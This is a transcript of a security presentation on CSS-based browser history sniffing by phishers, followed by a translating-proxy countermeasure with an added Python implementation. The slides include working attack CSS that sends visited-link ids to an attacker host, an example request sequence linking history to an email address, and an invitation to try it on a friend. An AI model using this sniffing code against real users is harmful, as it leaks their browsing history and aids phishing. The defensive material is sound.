Invasive Browser Sniffing and Countermeasures

Presentation transcript:

Invasive Browser Sniffing and Countermeasures
Markus Jakobsson, Sid Stamm

Phishing overview
Symantec says phishing attacks are up by 81 per cent in the first half of 2006.
The main goal of these attacks is to obtain confidential information (passwords, login information, and addresses) in order to meddle in people's financial affairs.
Number of phishing sites recorded by the APWG in July 2006: 14191

(Cartoon slide: the victim is pulled between "His wife", "His bank" and "His conscience". Caption: "Hurry up!")

He performed such a transaction: an ACH transfer. Nice for the phisher!

First things first: How does the phisher know his wife's name?
Jagatic, Johnson, Jakobsson, Menczer, "Social Phishing", to appear in CACM, available at http://www.stop-phishing.com

And then: How does the phisher know where he has been?

What you see: Link 1, Link 2, Link 3 (visited links rendered red, the rest blue).

The code:

    <style>
      a { color: blue; }
      #id1:visited { color: red; }
      #id2:visited { color: red; }
      #id3:visited { color: red; }
    </style>
    <a id="id1" href="x.com">Link 1</a>
    <a id="id2" href="y.com">Link 2</a>
    <a id="id3" href="z.com">Link 3</a>

And then: How does the phisher know where he has been?

Not visible: the links are empty, so the user sees nothing; for each visited link the :visited rule fetches a background image, which reports the link id to the attacker's server.

The code:

    <style>
      a { color: blue; }
      #id1:visited { background: url('e.com/?id=1'); }
      #id2:visited { background: url('e.com/?id=2'); }
      …
    </style>
    <a id="id1" href="x.com"></a>
    <a id="id2" href="y.com"></a>
    <a id="id3" href="z.com"></a>

Architecture of this attack (diagram)

The attack is as old as Feb. 2002: http://seclists.org/bugtraq/2002/Feb/0271.html
Reported recently (9/21/2006) at the Open Web Application Security Project (OWASP) by Jeremiah Grossman (WhiteHat Security).

Connecting to an email address (message sequence from the diagram)

    GET /?IAM=alice@x.com            (the response is a page with lots of links)
    GET /hit?id=1&IAM=alice@x.com
    GET /hit?id=42&IAM=alice@x.com

The phisher can now associate Alice with links 1 and 42.
Additionally, the email address can be obtained through auto-fill field extraction (see Fil's riddle site).

Try it? Try it on a friend? browser-recon.info

Where can this be stopped?
User paranoia (clear all)
Our approach
Jackson, Bortz, Boneh, Mitchell

Server-side defense against browser sniffing

Principle I: Avoid correct guesses!
  Example of an unguessable URL: www.chase.com/page.html?gr4450_ooP)+

Principle II: Cause false positives!
  Add wamu.com, citi.com, etc.
  Entry point pollution: the client's history is polluted with all entry points (the anonymity set).
  • POLLUTION DOES NOT require effort by the client; it can be done behind the scenes.

Server-side defense against browser sniffing

Principle I: Avoid correct guesses! But what about the portal?
Principle II: Cause false positives! But what if they are all stigmatizing?

Translating Proxy

(Diagram: within the domain of S, the client C sends "GET /?13fc021b" to the translator T; T sends "GET /" to the server S_B.)

Now we implement a "layer" on top of the server, called a Translator.
IDEALLY: the two would be on one computer, communicating via the loopback interface or another local mechanism.
WHY: so S_B doesn't have to change, to prevent site programming mistakes, etc.
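The following is an added example of the translator layer from the slides above (Principle I: avoid correct guesses). It is not the authors' prototype and does not come from their paper; the host name, the tag parameter name "t", and the choice of a truncated HMAC as the per-session tag are assumptions made for this example. Links in pages served by the unchanged server S_B are rewritten to carry a tag that depends on a secret held only by the translator for that client session, and incoming requests are forwarded to S_B only after the tag is verified and stripped. Because the tag is unguessable to anyone without the session secret, a history sniffer has no URL to test for. (Current browsers also limit what :visited may change, which blunts the CSS-based probe on the slides; the principle still applies to any side channel that tests for guessable URLs.)

```python
import hashlib
import hmac
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed placeholder host for the protected site S (not from the paper).
SITE_HOST = "www.bank.example"


class Translator:
    """Translating layer T in front of an unchanged server S_B.

    Every same-site link the client sees gets a per-session tag that cannot be
    computed without the session secret, so no one can guess the URL that would
    appear in the client's history.
    """

    TAG_PARAM = "t"  # hypothetical name of the query parameter carrying the tag

    def __init__(self):
        self.sessions = {}  # session id -> 32-byte secret, held only by T

    def new_session(self):
        """Start a client session and return its id (e.g. set in a cookie)."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = secrets.token_bytes(32)
        return sid

    def tag(self, sid, path):
        """HMAC-SHA256 of the path under the session secret, truncated to 64 bits."""
        return hmac.new(self.sessions[sid], path.encode(), hashlib.sha256).hexdigest()[:16]

    def translate(self, sid, url):
        """Rewrite one outgoing link: /page.html -> /page.html?t=<tag>."""
        parts = urlsplit(url)
        if parts.netloc not in ("", SITE_HOST):
            return url  # off-site links are left unchanged
        if not parts.path and not parts.netloc:
            return url  # empty or fragment-only href, nothing to protect
        path = parts.path or "/"
        query = parse_qsl(parts.query, keep_blank_values=True)
        query.append((self.TAG_PARAM, self.tag(sid, path)))
        return urlunsplit((parts.scheme, parts.netloc, path, urlencode(query), parts.fragment))

    def rewrite_html(self, sid, html):
        """Rewrite every double-quoted href in a page coming from S_B.

        A regex is used to keep the example short; a production translator
        would walk the HTML with a real parser.
        """
        return re.sub(r'href="([^"]*)"',
                      lambda m: 'href="%s"' % self.translate(sid, m.group(1)), html)

    def untranslate(self, sid, target):
        """Verify the tag on an incoming request target.

        Returns the plain target to forward to S_B, or None when the session is
        unknown or the tag is missing, duplicated, or wrong (a guessed URL).
        """
        if sid not in self.sessions:
            return None
        parts = urlsplit(target)
        query = parse_qsl(parts.query, keep_blank_values=True)
        tags = [v for k, v in query if k == self.TAG_PARAM]
        rest = [(k, v) for k, v in query if k != self.TAG_PARAM]
        if len(tags) != 1:
            return None
        path = parts.path or "/"
        expected = self.tag(sid, path)
        if not hmac.compare_digest(tags[0].encode(), expected.encode()):
            return None
        return urlunsplit(("", "", path, urlencode(rest), ""))


if __name__ == "__main__":
    # Constructed page from S_B with one same-site link and one off-site link.
    t = Translator()
    sid = t.new_session()
    page = '<a href="/page.html">Statements</a> <a href="https://other.example/">Other</a>'
    print(t.rewrite_html(sid, page))
    tagged = t.translate(sid, "/page.html")
    print(t.untranslate(sid, tagged))          # "/page.html" forwarded to S_B
    print(t.untranslate(sid, "/page.html"))    # None: untagged guess is refused
```

Only the translator holds the session secrets, so S_B keeps serving ordinary paths and cannot accidentally leak a guessable URL into the client's history; a different session gets different tags for the same pages, which also keeps one user's tags useless against another.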

Experimental data (figure)

What I have not mentioned
How do we deal with robot policies?
What about search engines and proxies?
How do we select false positives?
What about links to off-site data?
How do we handle bookmarks?
What does the prototype do?
Please see the paper!